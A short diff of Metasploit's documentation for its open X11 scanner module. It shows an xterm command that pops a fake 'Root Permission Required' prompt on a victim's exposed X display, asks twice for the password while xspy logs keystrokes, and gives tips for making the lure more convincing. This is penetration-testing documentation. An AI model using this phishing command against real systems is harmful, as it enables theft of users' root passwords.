kamaal44/Termux-2/home/metasploit-framework/documentation/modules/auxiliary/scanner/x11/open_x11.md

 This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10.

 1. start `xspy`
-2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -n 'root password: '; read passwd"`
+2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"`
   - Notice it asks twice for the password incase of a mistyped initial password.
 This can also be adjusted to just say password or the real user's username
   - The victim's typed text by the user will not be masked (`*`)